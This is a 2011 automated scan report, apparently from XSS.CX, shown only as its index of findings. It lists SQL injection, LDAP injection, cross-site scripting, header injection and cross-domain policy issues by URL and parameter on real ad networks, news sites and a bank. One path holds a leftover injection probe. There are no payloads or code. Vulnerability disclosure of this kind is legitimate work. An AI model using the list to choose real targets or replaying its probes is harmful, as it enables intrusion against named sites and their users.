XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09042011-01

Report generated by XSS.CX at Sun Sep 04 06:00:29 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://stat.synergy-e.com/piwik.php [site parameter]

1.2. http://www.mid-day.com/news/index.htm/x26amp [REST URL parameter 1]

1.3. http://www.mid-day.com/news/index.htm/x26amp [REST URL parameter 2]

1.4. http://www.mid-day.com/news/index.htm/x26amp [REST URL parameter 3]

1.5. http://www.mid-day.com/news/index.htm/x26amp [name of an arbitrarily supplied request parameter]

1.6. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 1]

1.7. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 2]

1.8. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 3]

1.9. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 4]

1.10. http://www.mid-day.com/news/local/index.htm/x26amp [name of an arbitrarily supplied request parameter]

1.11. http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142 [name of an arbitrarily supplied request parameter]

1.12. http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 [REST URL parameter 2]

1.13. http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 [name of an arbitrarily supplied request parameter]

1.14. http://www.networkadvertising.org/managing/optout_results.asp [__utmb cookie]

1.15. http://www.ticketmaster.com/Sporting-Kansas-City-tickets/artist/805957 [name of an arbitrarily supplied request parameter]

2. ASP.NET tracing enabled

3. LDAP injection

3.1. http://ads.masslive.com/RealMedia/ads/adstream.cap [c parameter]

3.2. http://ads.mlive.com/RealMedia/ads/adstream.cap [c parameter]

3.3. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter]

3.4. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [c parameter]

3.5. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [c parameter]

3.6. http://pixel.quantserve.com/optout_set [nocache parameter]

3.7. http://www.networkadvertising.org/managing/optout_results.asp [optThis parameter]

4. Cross-site scripting (stored)

4.1. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]

4.2. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]

5. HTTP header injection

5.1. http://ads.masslive.com/RealMedia/ads/adstream.cap [c parameter]

5.2. http://ads.masslive.com/RealMedia/ads/adstream.cap [va parameter]

5.3. http://ads.mlive.com/RealMedia/ads/adstream.cap [c parameter]

5.4. http://ads.mlive.com/RealMedia/ads/adstream.cap [va parameter]

5.5. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter]

5.6. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [va parameter]

5.7. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter]

5.8. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]

5.9. http://d7.zedo.com/utils/ecSet.js [v parameter]

5.10. http://dp.33across.com/ps/ [33x_ps cookie]

5.11. http://login.dotomi.com/ucm/UCMController [redir_url parameter]

5.12. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [REST URL parameter 2]

5.13. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [c parameter]

5.14. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [dv parameter]

5.15. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [REST URL parameter 4]

5.16. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [c parameter]

5.17. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [va parameter]

5.18. http://optout.crwdcntrl.net/optout [ct parameter]

5.19. http://optout.crwdcntrl.net/optout [d parameter]

5.20. http://optout.crwdcntrl.net/optout [name of an arbitrarily supplied request parameter]

5.21. http://t.mookie1.com/t/v1/event [migDest parameter]

6. Cross-site scripting (reflected)

6.1. http://223.165.24.159/toiwidget/jsp/widget.jsp [city parameter]

6.2. http://223.165.24.159/toiwidget/jsp/widget.jsp [city parameter]

6.3. http://ad4.liverail.com/ [name of an arbitrarily supplied request parameter]

6.4. http://addoer.com/showfixads.php [tabname parameter]

6.5. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

6.6. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

6.7. http://ads3.bangkokpost.co.th/www/delivery/spc.php [zones parameter]

6.8. http://ads4.bangkokpost.co.th/ads_server/iframe [FONT_COLOR parameter]

6.9. http://ads4.bangkokpost.co.th/ads_server/iframe/ [FONT_COLOR parameter]

6.10. http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH [loc parameter]

6.11. http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH [name of an arbitrarily supplied request parameter]

6.12. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [kvinvtype parameter]

6.13. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [kvinvtype parameter]

6.14. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [kvinvtype parameter]

6.15. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [name of an arbitrarily supplied request parameter]

6.16. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [name of an arbitrarily supplied request parameter]

6.17. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [name of an arbitrarily supplied request parameter]

6.18. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top [REST URL parameter 4]

6.19. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top [REST URL parameter 5]

6.20. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top [REST URL parameter 6]

6.21. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top [REST URL parameter 7]

6.22. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top [REST URL parameter 4]

6.23. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top [REST URL parameter 5]

6.24. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top [REST URL parameter 6]

6.25. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top [REST URL parameter 7]

6.26. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [REST URL parameter 4]

6.27. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [REST URL parameter 5]

6.28. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [REST URL parameter 6]

6.29. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [REST URL parameter 7]

6.30. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [name of an arbitrarily supplied request parameter]

6.31. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [name of an arbitrarily supplied request parameter]

6.32. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 4]

6.33. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 5]

6.34. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 6]

6.35. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 7]

6.36. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [name of an arbitrarily supplied request parameter]

6.37. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [name of an arbitrarily supplied request parameter]

6.38. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 4]

6.39. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 5]

6.40. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 6]

6.41. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 7]

6.42. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [name of an arbitrarily supplied request parameter]

6.43. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 4]

6.44. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 5]

6.45. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 6]

6.46. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 7]

6.47. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 4]

6.48. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 5]

6.49. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 6]

6.50. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 7]

6.51. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [REST URL parameter 4]

6.52. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [REST URL parameter 5]

6.53. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [REST URL parameter 6]

6.54. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [name of an arbitrarily supplied request parameter]

6.55. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]

6.56. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]

6.57. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]

6.58. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]

6.59. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]

6.60. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]

6.61. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]

6.62. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]

6.63. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]

6.64. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]

6.65. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]

6.66. http://advertising.aol.com/nai/nai.php [action_id parameter]

6.67. http://advertising.aol.com/token/0/2/1170877546/ [REST URL parameter 1]

6.68. http://advertising.aol.com/token/0/3/1885310732/ [REST URL parameter 1]

6.69. http://advertising.aol.com/token/1/1/1462706141/ [REST URL parameter 1]

6.70. http://advertising.aol.com/token/1/3/1308197307/ [REST URL parameter 1]

6.71. http://advertising.aol.com/token/2/2/2011729621/ [REST URL parameter 1]

6.72. http://advertising.aol.com/token/2/3/868831419/ [REST URL parameter 1]

6.73. http://advertising.aol.com/token/3/2/1144859041/ [REST URL parameter 1]

6.74. http://advertising.aol.com/token/3/3/963398391/ [REST URL parameter 1]

6.75. http://advertising.aol.com/token/4/1/1214941173/ [REST URL parameter 1]

6.76. http://advertising.aol.com/token/4/3/1727096706/ [REST URL parameter 1]

6.77. http://advertising.aol.com/token/5/2/2011695027/ [REST URL parameter 1]

6.78. http://advertising.aol.com/token/5/3/803328935/ [REST URL parameter 1]

6.79. http://advertising.aol.com/token/6/1/737485457/ [REST URL parameter 1]

6.80. http://advertising.aol.com/token/6/3/807811660/ [REST URL parameter 1]

6.81. http://advertising.aol.com/token/7/1/585611182/ [REST URL parameter 1]

6.82. http://advertising.aol.com/token/7/3/1807570122/ [REST URL parameter 1]

6.83. http://advertising.aol.com/token/8/1/592246145/ [REST URL parameter 1]

6.84. http://advertising.aol.com/token/8/3/1337747048/ [REST URL parameter 1]

6.85. http://api.tweetmeme.com/v2/follow.js [REST URL parameter 1]

6.86. http://api.tweetmeme.com/v2/follow.js [screen_name parameter]

6.87. http://api.tweetmeme.com/v2/follow.js [style parameter]

6.88. http://b.scorecardresearch.com/beacon.js [c1 parameter]

6.89. http://b.scorecardresearch.com/beacon.js [c10 parameter]

6.90. http://b.scorecardresearch.com/beacon.js [c15 parameter]

6.91. http://b.scorecardresearch.com/beacon.js [c2 parameter]

6.92. http://b.scorecardresearch.com/beacon.js [c3 parameter]

6.93. http://b.scorecardresearch.com/beacon.js [c4 parameter]

6.94. http://b.scorecardresearch.com/beacon.js [c5 parameter]

6.95. http://b.scorecardresearch.com/beacon.js [c6 parameter]

6.96. http://bid.openx.net/json [c parameter]

6.97. http://cps.regis.edu/lp/computer_degree/it_degree.php [name of an arbitrarily supplied request parameter]

6.98. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter]

6.99. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter]

6.100. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [name of an arbitrarily supplied request parameter]

6.101. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [q parameter]

6.102. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [q parameter]

6.103. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]

6.104. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]

6.105. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [name of an arbitrarily supplied request parameter]

6.106. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [q parameter]

6.107. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_css_url parameter]

6.108. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_font_size parameter]

6.109. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_frame_height parameter]

6.110. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_frame_width parameter]

6.111. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgcolor parameter]

6.112. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgcolor parameter]

6.113. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgimage parameter]

6.114. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_description_color parameter]

6.115. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_podcast parameter]

6.116. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_title_color parameter]

6.117. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_target parameter]

6.118. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_target parameter]

6.119. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_bgcolor parameter]

6.120. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_bgimage parameter]

6.121. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_color parameter]

6.122. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_type parameter]

6.123. http://ib.adnxs.com/ab [ccd parameter]

6.124. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

6.125. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

6.126. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

6.127. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

6.128. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

6.129. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030 [REST URL parameter 1]

6.130. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030 [REST URL parameter 2]

6.131. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976">1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551 [REST URL parameter 1]

6.132. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976">1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551 [REST URL parameter 2]

6.133. http://msite.martiniadnetwork.com/index/ [REST URL parameter 1]

6.134. http://msite.martiniadnetwork.com/index/ [pid parameter]

6.135. http://msite.martiniadnetwork.com/index/ [sid parameter]

6.136. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]

6.137. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]

6.138. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]

6.139. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]

6.140. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]

6.141. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]

6.142. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]

6.143. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]

6.144. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]

6.145. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]

6.146. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]

6.147. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]

6.148. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]

6.149. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]

6.150. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]

6.151. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]

6.152. http://pixel.adsafeprotected.com/jspix [anId parameter]

6.153. http://pixel.adsafeprotected.com/jspix [campId parameter]

6.154. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

6.155. http://pixel.adsafeprotected.com/jspix [pubId parameter]

6.156. http://rtb0.doubleverify.com/rtb.ashx/verifyc [callback parameter]

6.157. http://social.ndtv.com/NDTVProfit [name of an arbitrarily supplied request parameter]

6.158. http://social.ndtv.com/groups.php [name of an arbitrarily supplied request parameter]

6.159. http://social.ndtv.com/home.php [name of an arbitrarily supplied request parameter]

6.160. http://social.ndtv.com/static/Comment/Form/ [ctype parameter]

6.161. http://social.ndtv.com/static/Comment/Form/ [ctype parameter]

6.162. http://social.ndtv.com/static/Comment/Form/ [identifier parameter]

6.163. http://social.ndtv.com/static/Comment/Form/ [identifier parameter]

6.164. http://social.ndtv.com/static/Comment/Form/ [link parameter]

6.165. http://social.ndtv.com/static/Comment/Form/ [link parameter]

6.166. http://social.ndtv.com/static/Comment/Form/ [title parameter]

6.167. http://social.ndtv.com/static/Comment/Form/ [title parameter]

6.168. http://social.ndtv.com/tbModel/comments.php [name of an arbitrarily supplied request parameter]

6.169. http://timesofindia.indiatimes.com/topic/Xss [REST URL parameter 2]

6.170. http://www.addthis.com/api/nai/optout [REST URL parameter 1]

6.171. http://www.addthis.com/api/nai/optout [REST URL parameter 1]

6.172. http://www.addthis.com/api/nai/optout [REST URL parameter 2]

6.173. http://www.addthis.com/api/nai/optout [REST URL parameter 2]

6.174. http://www.addthis.com/api/nai/optout [REST URL parameter 3]

6.175. http://www.addthis.com/api/nai/optout [REST URL parameter 3]

6.176. http://www.addthis.com/api/nai/status [REST URL parameter 1]

6.177. http://www.addthis.com/api/nai/status [REST URL parameter 1]

6.178. http://www.addthis.com/api/nai/status [REST URL parameter 2]

6.179. http://www.addthis.com/api/nai/status [REST URL parameter 2]

6.180. http://www.addthis.com/api/nai/status [REST URL parameter 3]

6.181. http://www.addthis.com/api/nai/status [REST URL parameter 3]

6.182. http://www.addthis.com/bookmark.php [REST URL parameter 1]

6.183. http://www.addthis.com/bookmark.php [REST URL parameter 1]

6.184. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

6.185. http://www.bangkokpost.com/_event.php [name of an arbitrarily supplied request parameter]

6.186. http://www.bangkokpost.com/_event.php [xURI parameter]

6.187. http://www.bangkokpost.com/_getContent_main.php [geography parameter]

6.188. http://www.bangkokpost.com/_getContent_main.php [name of an arbitrarily supplied request parameter]

6.189. http://www.bangkokpost.com/forum/search.php [name of an arbitrarily supplied request parameter]

6.190. http://www.bangkokpost.com/forum/viewforum.php [name of an arbitrarily supplied request parameter]

6.191. http://www.bangkokpost.com/forum/viewtopic.php [name of an arbitrarily supplied request parameter]

6.192. http://www.bangkokpost.com/search/news-and-article [REST URL parameter 2]

6.193. http://www.bangkokpost.com/search/news-and-article [name of an arbitrarily supplied request parameter]

6.194. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

6.195. http://www.ndtv.com/article/cities/mumbai-airports-main-runway-shut-till-8-am-flights-delayed-131003 [REST URL parameter 2]

6.196. http://www.ndtv.com/article/cities/mumbai-airports-main-runway-shut-till-8-am-flights-delayed-131003 [REST URL parameter 3]

6.197. http://www.ndtv.com/article/cities/mumbai-airports-main-runway-still-shut-flights-delayed-131003 [REST URL parameter 2]

6.198. http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142 [REST URL parameter 2]

6.199. http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142 [REST URL parameter 3]

6.200. http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 [REST URL parameter 2]

6.201. http://www.ndtv.com/video/player/flashback/flashback-the-magic-of-rishi-kapoor/209786 [REST URL parameter 3]

6.202. http://www.ndtv.com/video/player/flashback/flashback-the-magic-of-rishi-kapoor/209786 [REST URL parameter 4]

6.203. http://www.ndtv.com/video/player/news/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah/209797 [REST URL parameter 3]

6.204. http://www.ndtv.com/video/player/news/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah/209797 [REST URL parameter 4]

6.205. http://www.ndtv.com/video/player/the-big-fight/life-or-death-should-terrorists-be-shown-mercy/209810 [REST URL parameter 3]

6.206. http://www.ndtv.com/video/player/the-big-fight/life-or-death-should-terrorists-be-shown-mercy/209810 [REST URL parameter 4]

6.207. http://www.ndtv.com/video/player/the-car-bike-show/first-look-at-hondas-small-car-for-india-brio/209809 [REST URL parameter 3]

6.208. http://www.ndtv.com/video/player/the-car-bike-show/first-look-at-hondas-small-car-for-india-brio/209809 [REST URL parameter 4]

6.209. http://www.networkadvertising.org/managing/optout_results.asp [yahoo_token parameter]

6.210. http://www.scb.co.th/favicon.ico [REST URL parameter 1]

6.211. http://www.scb.co.th/scb_api/api_a_deposit.jsp [REST URL parameter 1]

6.212. http://www.scb.co.th/scb_api/img/api/t1new/bttn_calc.gif [REST URL parameter 1]

6.213. http://www.scb.co.th/scb_api/img/api/t1new/bttn_reset.gif [REST URL parameter 1]

6.214. http://www.scb.co.th/scb_api/scbapi.jsp [REST URL parameter 1]

6.215. http://www9.effectivemeasure.net/v4/em_js [ns parameter]

6.216. http://member.bangkokpost.com/login.php [Referer HTTP header]

6.217. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

6.218. http://www.addthis.com/bookmark.php [Referer HTTP header]

6.219. http://www.addthis.com/bookmark.php [Referer HTTP header]

6.220. http://advertising.aol.com/nai/nai.php [token_nai_ad_us-ec_adtechus_com cookie]

6.221. http://advertising.aol.com/nai/nai.php [token_nai_adserver_adtechus_com cookie]

6.222. http://advertising.aol.com/nai/nai.php [token_nai_adserverec_adtechus_com cookie]

6.223. http://advertising.aol.com/nai/nai.php [token_nai_adserverwc_adtechus_com cookie]

6.224. http://advertising.aol.com/nai/nai.php [token_nai_adsonar_com cookie]

6.225. http://advertising.aol.com/nai/nai.php [token_nai_adtech_de cookie]

6.226. http://advertising.aol.com/nai/nai.php [token_nai_advertising_com cookie]

6.227. http://advertising.aol.com/nai/nai.php [token_nai_glb_adtechus_com cookie]

6.228. http://advertising.aol.com/nai/nai.php [token_nai_tacoda_at_atwola_com cookie]

6.229. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [ZEDOIDA cookie]

6.230. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [ZEDOIDA cookie]

6.231. http://optimized-by.rubiconproject.com/a/4642/5271/7551-15.js [ruid cookie]

7. Flash cross-domain policy

7.1. http://33across.com/crossdomain.xml

7.2. http://a.collective-media.net/crossdomain.xml

7.3. http://a.netmng.com/crossdomain.xml

7.4. http://a.rfihub.com/crossdomain.xml

7.5. http://a.tribalfusion.com/crossdomain.xml

7.6. http://a1.interclick.com/crossdomain.xml

7.7. http://ad-apac.doubleclick.net/crossdomain.xml

7.8. http://ad.afy11.net/crossdomain.xml

7.9. http://ad.doubleclick.net/crossdomain.xml

7.10. http://ad.turn.com/crossdomain.xml

7.11. http://ad4.liverail.com/crossdomain.xml

7.12. http://adcontent.videoegg.com/crossdomain.xml

7.13. http://admonkey.dapper.net/crossdomain.xml

7.14. http://ads.amgdgt.com/crossdomain.xml

7.15. http://ads.undertone.com/crossdomain.xml

7.16. http://adserver.adtech.de/crossdomain.xml

7.17. http://adserver.adtechus.com/crossdomain.xml

7.18. http://api.facebook.com/crossdomain.xml

7.19. http://as.casalemedia.com/crossdomain.xml

7.20. http://avn.innity.com/crossdomain.xml

7.21. http://b.scorecardresearch.com/crossdomain.xml

7.22. http://bannerfarm.ace.advertising.com/crossdomain.xml

7.23. http://beacon.videoegg.com/crossdomain.xml

7.24. http://bh.contextweb.com/crossdomain.xml

7.25. http://c7.zedo.com/crossdomain.xml

7.26. http://cas.criteo.com/crossdomain.xml

7.27. http://cdn.media.innity.net/crossdomain.xml

7.28. http://cdn.turn.com/crossdomain.xml

7.29. http://clk.atdmt.com/crossdomain.xml

7.30. http://clk.fetchback.com/crossdomain.xml

7.31. http://core.videoegg.com/crossdomain.xml

7.32. http://d.tradex.openx.com/crossdomain.xml

7.33. http://d13.zedo.com/crossdomain.xml

7.34. http://d2.zedo.com/crossdomain.xml

7.35. http://d3.zedo.com/crossdomain.xml

7.36. http://d7.zedo.com/crossdomain.xml

7.37. http://dis.criteo.com/crossdomain.xml

7.38. http://dis.sv.us.criteo.com/crossdomain.xml

7.39. http://dp.33across.com/crossdomain.xml

7.40. http://edge.aperture.displaymarketplace.com/crossdomain.xml

7.41. http://external.ak.fbcdn.net/crossdomain.xml

7.42. http://http.tidaltv.com/crossdomain.xml

7.43. http://i.w55c.net/crossdomain.xml

7.44. http://ib.adnxs.com/crossdomain.xml

7.45. http://idcs.interclick.com/crossdomain.xml

7.46. http://imp.fetchback.com/crossdomain.xml

